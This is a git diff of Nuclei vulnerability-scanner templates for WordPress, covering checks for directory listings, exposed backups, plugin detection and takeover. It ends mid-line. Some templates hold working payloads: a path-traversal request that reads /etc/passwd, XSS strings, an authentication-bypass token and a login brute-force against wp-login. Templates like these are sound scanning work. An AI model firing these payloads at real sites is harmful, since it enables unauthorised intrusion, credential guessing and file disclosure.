nuclei-templates/Other/wordpress-bbpress-plugin-listing-11247.yaml rename to nuclei-templates/Other/wordpress-bbpress-plugin-listing-11245.yaml diff --git a/nuclei-templates/Other/wordpress-db-backup-listing-11248.yaml b/nuclei-templates/Other/wordpress-db-backup-listing-11248.yaml deleted file mode 100644 index 307fa1456a..0000000000 --- a/nuclei-templates/Other/wordpress-db-backup-listing-11248.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: wordpress-db-backup-listing - -info: - name: WordPress DB Backup - author: Suman_Kar - severity: medium - tags: wordpress,backup - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/database-backups/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of /" - - "wp-content/uploads/database-backups" - - ".sql" - condition: and - part: body - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/wordpress-db-backup-listing-11250.yaml b/nuclei-templates/Other/wordpress-db-backup-listing-11250.yaml new file mode 100644 index 0000000000..e224e52816 --- /dev/null +++ b/nuclei-templates/Other/wordpress-db-backup-listing-11250.yaml @@ -0,0 +1,22 @@ +id: wordpress-db-backup-listing +info: + name: WordPress DB Backup + author: Suman_Kar + severity: medium + tags: wordpress,backup +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/database-backups/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of /" + - "wp-content/uploads/database-backups" + - ".sql" + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-db-repair-11252.yaml b/nuclei-templates/Other/wordpress-db-repair-11252.yaml deleted file mode 100644 index 6cf8668d0b..0000000000 --- a/nuclei-templates/Other/wordpress-db-repair-11252.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: wordpress-db-repair - -info: - name: Wordpress DB Repair Exposed - author: _C0wb0y_ - severity: low - description: Discover enabled Wordpress repair page. - tags: wordpress,config,fpd - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/maint/repair.php" - - matchers-condition: and - matchers: - - type: word - words: - - "WordPress" - - - type: status - status: - - 200 - - - type: word - words: - - "define" - - "WP_ALLOW_REPAIR" - - "true" - condition: and - negative: true diff --git a/nuclei-templates/Other/wordpress-db-repair-11255.yaml b/nuclei-templates/Other/wordpress-db-repair-11255.yaml new file mode 100644 index 0000000000..5522479e9d --- /dev/null +++ b/nuclei-templates/Other/wordpress-db-repair-11255.yaml @@ -0,0 +1,26 @@ +id: wordpress-db-repair +info: + name: Wordpress DB Repair Exposed + author: _C0wb0y_ + severity: low + description: Discover enabled Wordpress repair page. + tags: wordpress,config,fpd +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/maint/repair.php" + matchers-condition: and + matchers: + - type: word + words: + - "<title>WordPress" + - type: status + status: + - 200 + - type: word + words: + - "define" + - "WP_ALLOW_REPAIR" + - "true" + condition: and + negative: true diff --git a/nuclei-templates/Other/wordpress-detect-11261.yaml b/nuclei-templates/Other/wordpress-detect.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-detect-11261.yaml rename to nuclei-templates/Other/wordpress-detect.yaml diff --git a/nuclei-templates/Other/wordpress-directory-listing-11262.yaml b/nuclei-templates/Other/wordpress-directory-listing-11262.yaml deleted file mode 100644 index 426b611ea1..0000000000 --- a/nuclei-templates/Other/wordpress-directory-listing-11262.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: wordpress-directory-listing -info: - name: Wordpress directory listing - author: Manas_Harsh - severity: info - tags: wordpress -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/" - - "{{BaseURL}}/wp-content/themes/" - - "{{BaseURL}}/wp-content/plugins/" - - "{{BaseURL}}/wp-includes/" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - Index of / diff --git a/nuclei-templates/Other/wordpress-directory-listing.yaml b/nuclei-templates/Other/wordpress-directory-listing.yaml new file mode 100644 index 0000000000..0e719cc724 --- /dev/null +++ b/nuclei-templates/Other/wordpress-directory-listing.yaml @@ -0,0 +1,17 @@ +id: wordpress-directory-listing +info: + name: Wordpress directory listing + author: Manas_Harsh + severity: info +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - Index of /wp-content/uploads diff --git a/nuclei-templates/Other/wordpress-elementor-plugin-listing-11267.yaml b/nuclei-templates/Other/wordpress-elementor-plugin-listing-11267.yaml new file mode 100644 index 0000000000..049baa8262 --- /dev/null +++ b/nuclei-templates/Other/wordpress-elementor-plugin-listing-11267.yaml @@ -0,0 +1,23 @@ +id: wordpress-elementor-plugin-listing +info: + name: WordPress Elementor Plugin Directory Listing + author: dhiyaneshDK + severity: info + description: Searches for sensitive directories present in the elementor wordpress plugin. + reference: + - https://www.exploit-db.com/ghdb/6297 + tags: wordpress,listing,plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/elementor/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/elementor/" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-elementor-plugin-listing-11269.yaml b/nuclei-templates/Other/wordpress-elementor-plugin-listing-11269.yaml deleted file mode 100644 index f9fea9983c..0000000000 --- a/nuclei-templates/Other/wordpress-elementor-plugin-listing-11269.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-elementor-plugin-listing -info: - name: WordPress Elementor Plugin Directory Listing - author: dhiyaneshDK - severity: info - description: Searches for sensitive directories present in the elementor wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6297 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/elementor/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/elementor/" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wordpress-emails-verification-for-woocommerce-11270.yaml b/nuclei-templates/Other/wordpress-emails-verification-for-woocommerce-11270.yaml deleted file mode 100644 index 97e8c51dc3..0000000000 --- a/nuclei-templates/Other/wordpress-emails-verification-for-woocommerce-11270.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-woocommerce-email-verification -info: - name: wordpress-emails-verification-for-woocommerce - author: random_robbie - severity: critical - tags: wordpress,wp-plugin - description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass - reference: https://wpvulndb.com/vulnerabilities/10318 - # GDPR plugin may give a false positive so double check headers -requests: - - method: GET - path: - - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - matchers-condition: and - matchers: - - type: word - words: - - "wordpress_logged_in" - part: header - - type: status - status: - - 401 - - 403 - negative: true diff --git a/nuclei-templates/Other/wordpress-emergency-script-11275.yaml b/nuclei-templates/Other/wordpress-emergency-script.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-emergency-script-11275.yaml rename to nuclei-templates/Other/wordpress-emergency-script.yaml diff --git a/nuclei-templates/Other/wordpress-git-config-11279.yaml b/nuclei-templates/Other/wordpress-git-config.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-git-config-11279.yaml rename to nuclei-templates/Other/wordpress-git-config.yaml diff --git a/nuclei-templates/Other/wordpress-infinitewp-auth-bypass.yaml b/nuclei-templates/Other/wordpress-infinitewp-auth-bypass-11285.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-infinitewp-auth-bypass.yaml rename to nuclei-templates/Other/wordpress-infinitewp-auth-bypass-11285.yaml diff --git a/nuclei-templates/Other/wordpress-instagram-feed.yaml b/nuclei-templates/Other/wordpress-instagram-feed.yaml deleted file mode 100644 index 1778552d75..0000000000 --- a/nuclei-templates/Other/wordpress-instagram-feed.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: wordpress-instagram-feed - -info: - name: Smash Balloon Social Photo Feed – Best Social Feed Plugin for WordPress Detection - author: ricardomaia - severity: info - reference: - - https://wordpress.org/plugins/instagram-feed/ - metadata: - plugin_namespace: instagram-feed - wpscan: https://wpscan.com/plugin/instagram-feed - tags: tech,wordpress,wp-plugin,top-100,top-200 - -http: - - method: GET - - path: - - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" - - payloads: - last_version: helpers/wordpress/plugins/instagram-feed.txt - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: - - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/nuclei-templates/Other/wordpress-installer-log-11292.yaml b/nuclei-templates/Other/wordpress-installer-log-11292.yaml deleted file mode 100644 index db620f218b..0000000000 --- a/nuclei-templates/Other/wordpress-installer-log-11292.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: wordpress-installer-log - -info: - name: WordPress Installer Log - author: dwisiswant0 - severity: info - tags: wordpress,log - -requests: - - method: GET - path: - - "{{BaseURL}}/installer-log.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG" - part: body - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/wordpress-installer-log.yaml b/nuclei-templates/Other/wordpress-installer-log.yaml new file mode 100644 index 0000000000..3e84e512d7 --- /dev/null +++ b/nuclei-templates/Other/wordpress-installer-log.yaml @@ -0,0 +1,19 @@ +id: wordpress-installer-log +info: + name: WordPress Installer Log + author: dwisiswant0 + severity: info + tags: wordpress,logs +requests: + - method: GET + path: + - "{{BaseURL}}/installer-log.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-lfi.yaml b/nuclei-templates/Other/wordpress-lfi(1).yaml similarity index 100% rename from nuclei-templates/Other/wordpress-lfi.yaml rename to nuclei-templates/Other/wordpress-lfi(1).yaml diff --git a/nuclei-templates/Other/wordpress-login-11295.yaml b/nuclei-templates/Other/wordpress-login-11295.yaml deleted file mode 100644 index 5311898db7..0000000000 --- a/nuclei-templates/Other/wordpress-login-11295.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: wordpress-login - -info: - name: WordPress login - author: its0x08 - severity: info - tags: panel,wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-login.php" - matchers: - - type: word - words: - - "WordPress" - - "Log In" - - '/wp-login.php?action=lostpassword">Lost your password?' - - '
    ' - condition: or diff --git a/nuclei-templates/Other/wordpress-login.yaml b/nuclei-templates/Other/wordpress-login.yaml new file mode 100644 index 0000000000..0372801292 --- /dev/null +++ b/nuclei-templates/Other/wordpress-login.yaml @@ -0,0 +1,18 @@ +id: wordpress-login +info: + name: WordPress login + author: its0x08 + severity: info + tags: panel,wordpress +requests: + - method: GET + path: + - "{{BaseURL}}/wp-login.php" + matchers: + - type: word + words: + - "WordPress" + - "Log In" + - '/wp-login.php?action=lostpassword">Lost your password?' + - '' + condition: or diff --git a/nuclei-templates/Other/wordpress-plugins-detect-11297.yaml b/nuclei-templates/Other/wordpress-plugins-detect-11297.yaml new file mode 100644 index 0000000000..78e62380ea --- /dev/null +++ b/nuclei-templates/Other/wordpress-plugins-detect-11297.yaml @@ -0,0 +1,27 @@ +id: wordpress-plugins-detect + +info: + name: WordPress Plugins Detection + author: 0xcrypto + severity: info + tags: fuzz,wordpress + +requests: + - raw: + - | + GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 + Host: {{Hostname}} + + payloads: + pluginSlug: helpers/wordlists/wordpress-plugins.txt + + threads: 50 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "== Description ==" diff --git a/nuclei-templates/Other/wordpress-plugins2.yaml b/nuclei-templates/Other/wordpress-plugins2.yaml deleted file mode 100644 index 3a1bc93f82..0000000000 --- a/nuclei-templates/Other/wordpress-plugins2.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-plugins-detect -info: - name: WordPress Plugins Detection - author: 0xcrypto - severity: info - tags: fuzz,wordpress -requests: - - raw: - - | - GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 - Host: {{Hostname}} - payloads: - pluginSlug: helpers/wordlists/wordpress-plugins.txt - threads: 50 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "== Description ==" diff --git a/nuclei-templates/Other/wordpress-rce-simplefilelist-11299.yaml b/nuclei-templates/Other/wordpress-rce-simplefilelist.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-rce-simplefilelist-11299.yaml rename to nuclei-templates/Other/wordpress-rce-simplefilelist.yaml diff --git a/nuclei-templates/Other/wordpress-redirection-plugin-listing-11306.yaml b/nuclei-templates/Other/wordpress-redirection-plugin-listing-11306.yaml new file mode 100644 index 0000000000..42254c8a52 --- /dev/null +++ b/nuclei-templates/Other/wordpress-redirection-plugin-listing-11306.yaml @@ -0,0 +1,23 @@ +id: wordpress-redirection-plugin-listing +info: + name: WordPress Redirection Plugin Directory Listing + author: dhiyaneshDk + severity: info + description: Searches for sensitive directories present in the wordpress-redirection plugin. + reference: + - https://www.exploit-db.com/ghdb/6436 + tags: wordpress,listing,plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/redirection/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/redirection/" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-redirection-plugin-listing.yaml b/nuclei-templates/Other/wordpress-redirection-plugin-listing.yaml deleted file mode 100644 index 116e5709c7..0000000000 --- a/nuclei-templates/Other/wordpress-redirection-plugin-listing.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-redirection-plugin-listing -info: - name: WordPress Redirection Plugin Directory Listing - author: dhiyaneshDk - severity: info - description: Searches for sensitive directories present in the wordpress-redirection plugin. - reference: https://www.exploit-db.com/ghdb/6436 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/redirection/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/redirection/" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wordpress-takeover-11313.yaml b/nuclei-templates/Other/wordpress-takeover-11313.yaml new file mode 100644 index 0000000000..536222d6ef --- /dev/null +++ b/nuclei-templates/Other/wordpress-takeover-11313.yaml @@ -0,0 +1,26 @@ +id: wordpress-takeover + +info: + name: WordPress takeover detection + author: pdteam,geeknik + severity: high + tags: takeover,wordpress + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Do you want to register" + - ".wordpress.com doesn’t exist" + condition: and + + - type: word + words: + - "cannot be registered" + negative: true diff --git a/nuclei-templates/Other/wordpress-takeover-11314.yaml b/nuclei-templates/Other/wordpress-takeover-11314.yaml deleted file mode 100644 index af835e3ff1..0000000000 --- a/nuclei-templates/Other/wordpress-takeover-11314.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wordpress-takeover -info: - name: WordPress takeover detection - author: pdteam,geeknik - severity: high - tags: takeover,wordpress - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - matchers-condition: and - matchers: - - type: word - words: - - "Do you want to register" - - ".wordpress.com doesn’t exist" - condition: and - - type: word - words: - - "cannot be registered" - negative: true diff --git a/nuclei-templates/Other/wordpress-themes-detect-11316.yaml b/nuclei-templates/Other/wordpress-themes-detect-11316.yaml deleted file mode 100644 index 6a3c621ae8..0000000000 --- a/nuclei-templates/Other/wordpress-themes-detect-11316.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wordpress-themes-detect -info: - name: WordPress Theme Detection - author: 0xcrypto, foulenzer - severity: high - tags: fuzz,wordpress -requests: - - raw: - - | - GET /wp-content/themes/{{theme}}/readme.txt HTTP/1.1 - Host: {{Hostname}} - payloads: - theme: - - twentyfifteen - - shapely - - onepress - threads: 50 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "== Description ==" diff --git a/nuclei-templates/Other/wordpress-themes2.yaml b/nuclei-templates/Other/wordpress-themes2.yaml new file mode 100644 index 0000000000..5d00b07f78 --- /dev/null +++ b/nuclei-templates/Other/wordpress-themes2.yaml @@ -0,0 +1,22 @@ +id: wordpress-themes-detect +info: + name: WordPress Theme Detection + author: 0xcrypto + severity: info + tags: fuzz,wordpress +requests: + - raw: + - | + GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 + Host: {{Hostname}} + payloads: + themeSlug: helpers/wordlists/wordpress-themes.txt + threads: 50 + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "== Description ==" diff --git a/nuclei-templates/Other/wordpress-tmm-db-migrate-11319.yaml b/nuclei-templates/Other/wordpress-tmm-db-migrate.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-tmm-db-migrate-11319.yaml rename to nuclei-templates/Other/wordpress-tmm-db-migrate.yaml diff --git a/nuclei-templates/Other/wordpress-total-upkeep-backup-download-11322.yaml b/nuclei-templates/Other/wordpress-total-upkeep-backup-download-11322.yaml new file mode 100644 index 0000000000..47fe8b3995 --- /dev/null +++ b/nuclei-templates/Other/wordpress-total-upkeep-backup-download-11322.yaml @@ -0,0 +1,27 @@ +id: wordpress-total-upkeep-backup-download +info: + name: WordPress Total Upkeep Database and Files Backup Download + author: princechaddha + severity: high + reference: + - https://www.exploit-db.com/exploits/49252 + tags: wordpress,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json" + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + - type: word + words: + - '"filepath"' + - '/wp-content/boldgrid_backup_' + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-total-upkeep-backup-download.yaml b/nuclei-templates/Other/wordpress-total-upkeep-backup-download.yaml deleted file mode 100644 index 02d1675a3f..0000000000 --- a/nuclei-templates/Other/wordpress-total-upkeep-backup-download.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: wordpress-total-upkeep-backup-download -info: - name: WordPress Total Upkeep Database and Files Backup Download - author: princechaddha - severity: high - reference: https://www.exploit-db.com/exploits/49252 - tags: wordpress,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json" - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - - type: word - words: - - '"filepath"' - - '/wp-content/boldgrid_backup_' - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wordpress-updraftplus-pem-key-11327.yaml b/nuclei-templates/Other/wordpress-updraftplus-pem-key-11328.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-updraftplus-pem-key-11327.yaml rename to nuclei-templates/Other/wordpress-updraftplus-pem-key-11328.yaml diff --git a/nuclei-templates/Other/wordpress-upload-data.yaml b/nuclei-templates/Other/wordpress-upload-data.yaml new file mode 100644 index 0000000000..96634b10c2 --- /dev/null +++ b/nuclei-templates/Other/wordpress-upload-data.yaml @@ -0,0 +1,24 @@ +id: wordpress-upload-data +info: + name: wordpress-upload-data + author: pussycat0x + severity: medium + description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. + reference: https://www.exploit-db.com/ghdb/7040 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/data.txt" + matchers-condition: and + matchers: + - type: word + words: + - "admin:" + - type: word + part: header + words: + - "text/plain" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-user-enum-11330.yaml b/nuclei-templates/Other/wordpress-user-enum-11333.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-user-enum-11330.yaml rename to nuclei-templates/Other/wordpress-user-enum-11333.yaml diff --git a/nuclei-templates/Other/wordpress-weak-credentials-11337.yaml b/nuclei-templates/Other/wordpress-weak-credentials-11337.yaml new file mode 100644 index 0000000000..0bec5f6f85 --- /dev/null +++ b/nuclei-templates/Other/wordpress-weak-credentials-11337.yaml @@ -0,0 +1,37 @@ +id: wordpress-weak-credentials + +info: + name: WordPress Weak Credentials + author: evolutionsec + severity: critical + tags: wordpress,default-login,fuzz + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + log={{users}}&pwd={{passwords}} + + payloads: + users: helpers/wordlists/wp-users.txt + passwords: helpers/wordlists/wp-passwords.txt + threads: 50 + attack: clusterbomb + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: word + words: + - '/wp-admin' + - 'wordpress_logged_in' + condition: and + part: header \ No newline at end of file diff --git a/nuclei-templates/Other/wordpress-weak-credentials.yaml b/nuclei-templates/Other/wordpress-weak-credentials.yaml deleted file mode 100644 index 4571be435c..0000000000 --- a/nuclei-templates/Other/wordpress-weak-credentials.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: wordpress-weak-credentials -info: - name: WordPress - Weak Credentials - author: evolutionsec - severity: critical - description: | - Weak WordPress Credentials were discovered. - reference: - - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cve-id: - cwe-id: CWE-522 - tags: wordpress,default-login,fuzz -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} - - log={{users}}&pwd={{passwords}} - payloads: - users: helpers/wordlists/wp-users.txt - passwords: helpers/wordlists/wp-passwords.txt - threads: 50 - attack: clusterbomb - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: header - words: - - '/wp-admin' - - 'wordpress_logged_in' - condition: and - - type: status - status: - - 302 - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/Other/wordpress-woocommerce-listing-11338.yaml b/nuclei-templates/Other/wordpress-woocommerce-listing-11338.yaml index 300e671075..92f0519660 100644 --- a/nuclei-templates/Other/wordpress-woocommerce-listing-11338.yaml +++ b/nuclei-templates/Other/wordpress-woocommerce-listing-11338.yaml @@ -1,12 +1,13 @@ id: wordpress-woocommerce-listing + info: name: WordPress Woocommerce Plugin Directory Listing author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the woocommerce wordpress plugin. - reference: - - https://www.exploit-db.com/ghdb/6192 + reference: https://www.exploit-db.com/ghdb/6192 tags: wordpress,listing,plugin,woocommerce + requests: - method: GET path: @@ -18,6 +19,7 @@ requests: - "Index of" - "/wp-content/plugins/woocommerce/" condition: and + - type: status status: - 200 diff --git a/nuclei-templates/Other/wordpress-woocommerce-sqli.yaml b/nuclei-templates/Other/wordpress-woocommerce-sqli.yaml index 797b5ed6d1..374d2b2e3f 100644 --- a/nuclei-templates/Other/wordpress-woocommerce-sqli.yaml +++ b/nuclei-templates/Other/wordpress-woocommerce-sqli.yaml @@ -1,19 +1,12 @@ id: wordpress-woocommerce-sqli info: - name: Woocommerce Unauthenticated SQL Injection + name: Unauthenticated SQL injection Woocommerce author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. tags: wordpress,woocommerce,sqli,wp-plugin,injection reference: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: - cwe-id: CWE-89 requests: - method: GET path: @@ -35,5 +28,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/nuclei-templates/Other/wordpress-wordfence-lfi-11346.yaml b/nuclei-templates/Other/wordpress-wordfence-lfi-11346.yaml deleted file mode 100644 index 29dbdd85a2..0000000000 --- a/nuclei-templates/Other/wordpress-wordfence-lfi-11346.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: wordpress-wordfence-lfi -info: - name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure - author: 0x_Akoko - severity: high - reference: - - https://www.exploit-db.com/exploits/48061 - - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ - tags: wordpress,wp-plugin,lfi,wordfence -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wordpress-wordfence-lfi-11350.yaml b/nuclei-templates/Other/wordpress-wordfence-lfi-11350.yaml new file mode 100644 index 0000000000..28476103e4 --- /dev/null +++ b/nuclei-templates/Other/wordpress-wordfence-lfi-11350.yaml @@ -0,0 +1,25 @@ +id: wordpress-wordfence-lfi +info: + name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure + author: 0x_Akoko + severity: high + reference: + - https://www.exploit-db.com/exploits/48061 + - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ + tags: wordpress,wp-plugin,lfi,wordfence + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11353.yaml b/nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11353.yaml new file mode 100644 index 0000000000..ef0527d5a1 --- /dev/null +++ b/nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11353.yaml @@ -0,0 +1,25 @@ +id: wordpress-wordfence-waf-bypass-xss +info: + name: Wordpress Wordfence WAF - Cross-Site Scripting + author: hackergautam + severity: medium + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 + tags: wordpress,wordfence,xss,bypass +requests: + - method: GET + path: + - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6" + matchers-condition: and + matchers: + - type: word + words: + - + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11356.yaml b/nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11356.yaml deleted file mode 100644 index 6f3cc78548..0000000000 --- a/nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11356.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wordpress-wordfence-waf-bypass-xss -info: - author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 - severity: medium - tags: wordpress,wordfence,xss,bypass -requests: - - method: GET - path: - - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6" - matchers-condition: and - matchers: - - type: word - words: - - - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wordpress-wordfence-xss-11359.yaml b/nuclei-templates/Other/wordpress-wordfence-xss-11359.yaml new file mode 100644 index 0000000000..e1bfc8f0de --- /dev/null +++ b/nuclei-templates/Other/wordpress-wordfence-xss-11359.yaml @@ -0,0 +1,20 @@ +id: wordpress-wordfence-xss +info: + name: WordPress Wordfence 7.4.6 Cross Site Scripting + author: madrobot + severity: medium + tags: wordpress,wp-plugin,xss +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/Other/wordpress-wordfence-xss-11361.yaml b/nuclei-templates/Other/wordpress-wordfence-xss-11361.yaml deleted file mode 100644 index a6622eefb2..0000000000 --- a/nuclei-templates/Other/wordpress-wordfence-xss-11361.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wordpress-wordfence-xss -info: - name: WordPress Wordfence 7.4.6 Cross Site Scripting - author: madrobot - severity: medium - tags: wordpress,wp-plugin,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" - matchers-condition: and - matchers: - - type: word - words: - - "'>\"" - part: body - - type: word - words: - - "text/html" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wordpress-workflow (copy 1).yaml b/nuclei-templates/Other/wordpress-workflow (copy 1).yaml index 86bf5b16db..24f7035973 100644 --- a/nuclei-templates/Other/wordpress-workflow (copy 1).yaml +++ b/nuclei-templates/Other/wordpress-workflow (copy 1).yaml @@ -1,11 +1,29 @@ id: 